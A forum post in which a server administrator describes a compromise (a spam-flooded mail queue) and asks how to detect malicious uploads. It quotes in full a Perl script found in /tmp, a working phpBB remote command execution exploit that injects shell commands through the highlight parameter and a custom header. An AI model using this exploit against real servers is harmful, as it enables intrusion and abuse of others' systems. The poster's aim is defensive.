Facebook
Twitter
E
ElricM
Guest
Two days ago, my site became super sluggish, I was configuring apache and got an error there no no available sockets, then I noticed I had almost 400,000 spam messages in the mail queue. So I rebooted the system, stopped the queue and deleted all the messages with qmail-remove. Today I found this in the /tmp directory:
/tmp/outlaw/trash4.pl
How do you prevent/detect stuff like this from being uploaded and executed?
/tmp/outlaw/trash4.pl
Code:
use strict;
use IO::Socket;
unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }
$ARGV[0] =~ m![url]http://[/url](.*?)/(.*?t=\d+)!;
my ($server, $port) = split (/:/,$1);
$port = 80 unless defined($port);
$server = $1 unless defined($server);
my ($url, $command) = $2;
print "$server - $port - $url\n";
while () {
print "trash4> ";
while(<STDIN>) {
$command=$_;
chomp($command);
last;
}
&send($command);
}
sub send {
my $ok = 0;
my $cmd = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
my $string = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
"Host: $server\nPHP: $cmd\n\n\n\n";
my $socket = IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "can't connect to: $server : $@\n";
print $socket $string;
while(<$socket>) {
if (/#PHPBBEXPLOIT#/) {
close($socket) and last if $ok eq 2;
$ok++;
next;
}
print if $ok eq "1";
}
}
exit 0;How do you prevent/detect stuff like this from being uploaded and executed?
